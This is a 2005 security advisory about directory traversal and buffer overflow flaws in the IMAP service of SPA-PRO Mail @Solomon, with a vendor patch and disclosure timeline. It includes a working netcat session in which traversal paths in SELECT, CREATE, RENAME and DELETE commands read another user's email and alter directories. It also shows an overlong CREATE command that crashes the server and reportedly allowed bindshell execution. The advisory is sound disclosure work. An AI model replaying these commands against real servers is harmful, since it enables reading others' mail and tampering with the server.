Objectives About Us Sponsors News Past Events Contact Us
Login G-TEC CC Mirror Forums Links

 

 

SIG^2 Vulnerability Research Advisory

SPA-PRO Mail @Solomon IMAP Server Directory Traversal and Buffer Overflow Vulnerabilities

by Tan Chew Keong
Release Date: 02 Jun 2005
Japanese Version

Summary

SPA-PRO Mail @Solomon is a stable and high speed mail server that supports multiple domains. It is low cost, easy to setup, and has low maintenance cost as compared to other products. It is best suited for use as departmental mail server, in medium enterprises, in educational institutes, and by hosting companies.

A directory traversal vulnerability was found in SPA-PRO Mail @Soloman's IMAP service. This vulnerability may be exploited by a malicious user to view other user's email, create arbitrary directories on the server, delete empty directories on the server, and/or rename directories on the server. A buffer overflow vulnerability also exists. This vulnerability is triggered when the IMAP service receives an overly long folder name in the create command. This vulnerability may be exploited to crash the IMAP service or to execute arbitrary code.

 
Tested System

SPA-PRO Mail @Solomon Version 4.00 (SPA-IMAP4S 4.01) on Japanese Win2K SP4.

 
Details

This advisory documents two vulnerabilities found in the IMAP server of SPA-PRO Mail @Soloman. The first is a directory traversal vulnerability. The second is a buffer oveflow vulnerability.

 
1. Multiple Commands Directory Traversal Vulnerability.

In the default installation of SPA-PRO Mail @Solomon, the users' IMAP folders are stored in subdirectories under C:\mail\. SPA-PRO Mail @Solomon failed to sanitize received IMAP folder names that have directory traversal sequences containing the forward-slash and the back-slash characters. Several IMAP commands are affected including SELECT, CREATE, DELETE and RENAME. This may be exploited in a directory traversal attack by a malicious user to view other user's email, create arbitrary directories on the server, delete empty directories on the server, and/or rename directories on the server. This is illustrated below. 

C:\>nc 192.168.2.102 143
* OK SPA-PRO IMAP4rev1 Server @Solomon (4.01) Ready. Licence will be expired in 30 days.
1 login "testuser2" "testuser2"					// login as testuser2
1 OK login completed
2 select "../testuser/inbox"					// selected testuser's inbox
* 1 EXISTS
* 1 RECENT
* OK [UNSEEN 1] Message 1 is first unseen
* OK [UIDVALIDITY 893984814] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Deleted \Seen \*)] Limited
2 OK [READ-WRITE] select completed
3 uid fetch 1:* (flags)
* 1 FETCH (FLAGS (\Recent) UID 1)
3 OK fetch completed
4 uid fetch 1 (UID RFC822.SIZE FLAGS BODY.PEEK[])	// retrieve testuser's email
* 1 FETCH (UID 1 RFC822.SIZE 620 FLAGS (\Recent) BODY[] {620}
Received: from [192.168.2.101] (unverified [192.168.2.101]) by 2xeuqvc4h7yysw5
        (SPA-PRO ESMTP Receiver @Solomon (4.07)) with ESMTP id <B0000000001@2xeuqvc4h7yysw5>;
        Sat, 28 May 2005 12:45:06 +0800
Message-ID: <4297F754.8060305@security.org.sg>
Date: Sat, 28 May 2005 12:45:08 +0800
From: Chew Keong TAN 
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  testuser@xxxxx
Subject: This is test subject
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

This is a test email.
)
4 OK fetch completed
5 create "../../../../../hacked"				// create directory in C:\
5 OK create completed
6 rename "../../../../../hacked" "../../../../../hacked2"	// rename directory in C:\
6 OK rename successful
7 delete "../../../../../hacked2"				// delete directory in C:\
7 OK delete successful
8 select "..\testuser\inbox"					// Using back-slash works too.
* 1 EXISTS
* 1 RECENT
* OK [UNSEEN 1] Message 1 is first unseen
* OK [UIDVALIDITY 893984814] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Deleted \Seen \*)] Limited
8 OK [READ-WRITE] select completed

 
2. Create Command Buffer Overflow Vulnerability.

A buffer overflow vulnerability is triggered when the IMAP service receives an overly long folder name in the create command. This may be exploited to crash the IMAP service or to execute arbitrary code. A sample command that will trigger the overflow is shown below. The exact length of the folder name that will trigger the overflow depends on the length of mail directory name and the length of the user name. 

C:\>nc 192.168.2.102 143
* OK SPA-PRO IMAP4rev1 Server @Solomon (4.01) Ready. Licence will be expired in 30 days.
1 login "testuser" "testuser"
1 OK login completed
2 create "AAAABBBBCCCCDDDDEEEEFFFF...[Approx 260 bytes]..."
CRASH...

The following Ollydbg screen capture shows the overwritten EIP. On our test system, we were able to exploit this vulnerability to execute bindshell shellcode.

 
Patch

  1. Upgrade the SPA-IMAP4S component of SPA-PRO Mail @Solomon to version 4.05.

 
Disclosure Timeline

27 May 05 - Vulnerability Discovered.
28 May 05 - Initial Vendor Notification.
28 May 05 - Initial Vendor Reply.
29 May 05 - Sent Vulnerability Report to Vendor.
30 May 05 - Re-sent Vulnerability Report to Vendor.
30 May 05 - Vendor Provided SPA-IMAP4S Version 4.03 for Testing.
31 May 05 - Informed Vendor that Directory Traversal Vulnerability is not Fully Fixed and Informed Vendor of Buffer Overflow Vulnerability.
31 May 05 - Vendor Provided SPA-IMAP4S Version 4.04 for Testing.
31 May 05 - Informed Vendor that Directory Traversal Vulnerability is still not Fully Fixed.
31 May 05 - Vendor Provided SPA-IMAP4S Version 4.05, which fixes the vulnerability.
02 Jun 05 - Public Release.

 
Contacts

For further questions and enquries, email them to the following.

Overall-in-charge: Tan Chew Keong


Updated: 31/05/2005
webmaster@security.org.sg